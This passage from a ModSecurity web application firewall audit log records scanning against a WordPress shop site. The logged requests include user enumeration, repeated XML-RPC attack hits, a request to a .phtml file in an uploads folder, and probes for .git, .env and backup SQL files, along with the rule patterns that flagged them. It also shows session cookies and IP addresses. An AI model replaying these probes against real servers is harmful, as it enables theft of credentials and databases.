"www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCrI-TJOk1gXj_qIh4XCwAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750117155893735 4418 (- - -) Stopwatch2: 1750117155893735 4418; combined=2303, p1=363, p2=1808, p3=38, p4=38, p5=56, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c5848e50-Z-- --725ce979-A-- [17/Jun/2025:05:09:29.797416 +0530] aFCrMJWbMc1Q3J_M-mhHygAAAAo 146.190.105.35 60470 127.0.0.1 7081 --725ce979-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: PHPSESSID=ainu25g2ip4tjss8inin108m3e; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_6015de3fcac0ffebd52b56a3d23ca9%7C%7C1750289965%7C%7C1750286365%7C%7C362260abd72a192b7a42709dea37faae; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c4d90396d4b25cec9deb6b2dcf5ff5fd%7C%7C1750289965%7C%7C1750286365%7C%7C58f9eea4013365e610b61da226a23d85 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --725ce979-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex Link: <https://sarainternational.cstechns.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c4d90396d4b25cec9deb6b2dcf5ff5fd%7C%7C1750289965%7C%7C1750286365%7C%7C58f9eea4013365e610b61da226a23d85; expires=Wed, 18 Jun 2025 23:39:25 GMT; Max-Age=172796; path=/ Connection: close Content-Type: application/json; charset=UTF-8 --725ce979-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "sarainternational.cstechns.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFCrMJWbMc1Q3J_M-mhHygAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117168599810 1197729 (- - -) Stopwatch2: 1750117168599810 1197729; combined=2693, p1=348, p2=2213, p3=0, p4=0, p5=131, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --725ce979-Z-- --a8bf5542-A-- [17/Jun/2025:05:09:37.437464 +0530] aFCrOJWbMc1Q3J_M-mhHzgAAAAo 146.190.105.35 59264 127.0.0.1 7081 --a8bf5542-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=4qn1ioudjk4p08m8h6quqn6lul; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_5a0496aebaef65cbbec276ff52195e%7C%7C1750289975%7C%7C1750286375%7C%7Cd6ac71cceaa1e6fb97b737cf803ae4fe; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=e748e4abfe619254509fa17b97ba28b0%7C%7C1750289976%7C%7C1750286376%7C%7Cdabd34eadc5398dd6e70e33f59d24223 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a8bf5542-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=tani09njt349lbnl8rkqb837ls; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_35690f33c03c0d35b4f35165b83f2e%7C%7C1750289977%7C%7C1750286377%7C%7Cd534333c3faf13143ae00a15f326e817; expires=Wed, 18 Jun 2025 23:39:37 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f74e6bc89231b068899e2d70e8f1bcb2%7C%7C1750289977%7C%7C1750286377%7C%7C8fc1bbecd7601254208838878d60b240; expires=Wed, 18 Jun 2025 23:39:37 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a8bf5542-E-- --a8bf5542-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCrOJWbMc1Q3J_M-mhHzgAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117176410477 1027072 (- - -) Stopwatch2: 1750117176410477 1027072; combined=2836, p1=371, p2=2083, p3=99, p4=40, p5=152, sr=89, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a8bf5542-Z-- --7b87f93a-A-- [17/Jun/2025:05:10:37.139798 +0530] aFCrdFCTF37l_jAzt4oSVQAAAAU 146.190.105.35 37230 127.0.0.1 7081 --7b87f93a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=42437cpkuq85efh92gpefq1g25; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_181e0995fe3f49ce2f8bd87350452f%7C%7C1750290035%7C%7C1750286435%7C%7Cedd2b23e2c72b4d03765163f3f09dc07; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8ab3a28f13f5da7b64ef7ccdcdada321%7C%7C1750290035%7C%7C1750286435%7C%7C7a37532eb8135c791f7ddf741dfea4f3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --7b87f93a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=23b7bod4b4r8f94eivu8r030d5; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_4e30075d5217204b5d12f9f9d930a9%7C%7C1750290036%7C%7C1750286436%7C%7C28eca2110c3783e2058ef0f649d2732f; expires=Wed, 18 Jun 2025 23:40:36 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=1851d38d14d6d52d523876ead00f0894%7C%7C1750290037%7C%7C1750286437%7C%7C8ecd8e61e3e0e2a0c25b3c6f44b6681e; expires=Wed, 18 Jun 2025 23:40:37 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7b87f93a-E-- --7b87f93a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCrdFCTF37l_jAzt4oSVQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117236113497 1026382 (- - -) Stopwatch2: 1750117236113497 1026382; combined=2927, p1=394, p2=2139, p3=105, p4=40, p5=157, sr=94, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b87f93a-Z-- --47b00d75-A-- [17/Jun/2025:05:11:38.115194 +0530] aFCrsdyZ4SMykfn97vy3EgAAAAs 146.190.105.35 54860 127.0.0.1 7081 --47b00d75-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=ufh4k3kusn30et48rk9a2725mi; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b0920334d0b99e74924c7568847ae4%7C%7C1750290096%7C%7C1750286496%7C%7Cfa536d0a7da5548933a0a72739a1401d; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5623ce3a692a2f58c98df841cf18757c%7C%7C1750290096%7C%7C1750286496%7C%7Ce5ef48a29f5d579b9e5daa0a1a8b2806 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --47b00d75-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=5c85dcrr6t07f7bl9f9irf49ci; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_87f3245c7e764ee5175b75381786bd%7C%7C1750290097%7C%7C1750286497%7C%7C023c793c4b602e6a101e1df913877c57; expires=Wed, 18 Jun 2025 23:41:37 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=3c3fd1da68a287043e3586e0791a8573%7C%7C1750290098%7C%7C1750286498%7C%7C8ab45f343e00bc8cd058a03fd80d3ffd; expires=Wed, 18 Jun 2025 23:41:38 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --47b00d75-E-- --47b00d75-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCrsdyZ4SMykfn97vy3EgAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117297029346 1085934 (- - -) Stopwatch2: 1750117297029346 1085934; combined=2927, p1=390, p2=2110, p3=113, p4=39, p5=173, sr=96, sw=102, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --47b00d75-Z-- --10a04946-A-- [17/Jun/2025:05:11:55.904966 +0530] aFCrw5VkCcfT-Z8NQYzEhwAAAAc 185.177.72.204 35948 127.0.0.1 7080 --10a04946-B-- GET /.git/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close Accept-Encoding: gzip --10a04946-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --10a04946-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/HEAD"] [unique_id "aFCrw5VkCcfT-Z8NQYzEhwAAAAc"] Stopwatch: 1750117315901574 3444 (- - -) Stopwatch2: 1750117315901574 3444; combined=2082, p1=473, p2=1488, p3=30, p4=26, p5=65, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --10a04946-Z-- --42382822-A-- [17/Jun/2025:05:11:58.557278 +0530] aFCrxtyZ4SMykfn97vy3HAAAAAs 185.177.72.204 36194 127.0.0.1 7080 --42382822-B-- GET /.backup HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --42382822-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --42382822-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.backup"] [unique_id "aFCrxtyZ4SMykfn97vy3HAAAAAs"] Stopwatch: 1750117318554173 3177 (- - -) Stopwatch2: 1750117318554173 3177; combined=1936, p1=322, p2=1507, p3=18, p4=25, p5=64, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --42382822-Z-- --1ce7cf1d-A-- [17/Jun/2025:05:11:58.668514 +0530] aFCrxgGFf516NUzzD0B2_QAAAAg 185.177.72.204 36202 127.0.0.1 7080 --1ce7cf1d-B-- GET /.backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1ce7cf1d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ce7cf1d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".backup.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".backup.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.backup.sql"] [unique_id "aFCrxgGFf516NUzzD0B2_QAAAAg"] Stopwatch: 1750117318665121 3436 (- - -) Stopwatch2: 1750117318665121 3436; combined=2184, p1=283, p2=1800, p3=20, p4=27, p5=54, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1ce7cf1d-Z-- --2c530c33-A-- [17/Jun/2025:05:11:59.110993 +0530] aFCrxwrsPejRtmHkrKLgLgAAAAE 185.177.72.204 36244 127.0.0.1 7080 --2c530c33-B-- GET /.backup/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2c530c33-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c530c33-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.backup/db.sql"] [unique_id "aFCrxwrsPejRtmHkrKLgLgAAAAE"] Stopwatch: 1750117319107959 3087 (- - -) Stopwatch2: 1750117319107959 3087; combined=1939, p1=373, p2=1442, p3=20, p4=26, p5=78, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2c530c33-Z-- --f6cfa535-A-- [17/Jun/2025:05:11:59.221591 +0530] aFCrx4oVQnPDyHnl9oPTOQAAAAY 185.177.72.204 36254 127.0.0.1 7080 --f6cfa535-B-- GET /.backup/mysql.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f6cfa535-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6cfa535-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.backup/mysql.sql"] [unique_id "aFCrx4oVQnPDyHnl9oPTOQAAAAY"] Stopwatch: 1750117319218316 3320 (- - -) Stopwatch2: 1750117319218316 3320; combined=2057, p1=406, p2=1524, p3=22, p4=43, p5=62, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6cfa535-Z-- --b7e52328-A-- [17/Jun/2025:05:11:59.993868 +0530] aFCrx5WbMc1Q3J_M-mhIQwAAAAo 185.177.72.204 59834 127.0.0.1 7080 --b7e52328-B-- GET /.cpanel/caches/config/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b7e52328-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7e52328-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.cpanel/caches/config/.env"] [unique_id "aFCrx5WbMc1Q3J_M-mhIQwAAAAo"] Stopwatch: 1750117319990290 3623 (- - -) Stopwatch2: 1750117319990290 3623; combined=2198, p1=481, p2=1619, p3=22, p4=25, p5=51, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b7e52328-Z-- --d7cf7023-A-- [17/Jun/2025:05:12:00.217194 +0530] aFCryAJ4p5Cdblnjra53fwAAAAI 185.177.72.204 59844 127.0.0.1 7080 --d7cf7023-B-- GET /.database.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d7cf7023-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7cf7023-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".database.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".database.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.database.bak"] [unique_id "aFCryAJ4p5Cdblnjra53fwAAAAI"] Stopwatch: 1750117320214153 3095 (- - -) Stopwatch2: 1750117320214153 3095; combined=1910, p1=327, p2=1483, p3=19, p4=25, p5=56, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d7cf7023-Z-- --827c9c16-A-- [17/Jun/2025:05:12:00.327956 +0530] aFCryJVkCcfT-Z8NQYzEjwAAAAc 185.177.72.204 59858 127.0.0.1 7080 --827c9c16-B-- GET /.database.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --827c9c16-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --827c9c16-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".database.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".database.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.database.sql"] [unique_id "aFCryJVkCcfT-Z8NQYzEjwAAAAc"] Stopwatch: 1750117320324372 3629 (- - -) Stopwatch2: 1750117320324372 3629; combined=2267, p1=471, p2=1698, p3=20, p4=27, p5=51, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --827c9c16-Z-- --ea77bc4e-A-- [17/Jun/2025:05:12:00.659241 +0530] aFCryAJ4p5Cdblnjra53ggAAAAI 185.177.72.204 59870 127.0.0.1 7080 --ea77bc4e-B-- GET /.db_backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ea77bc4e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea77bc4e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data 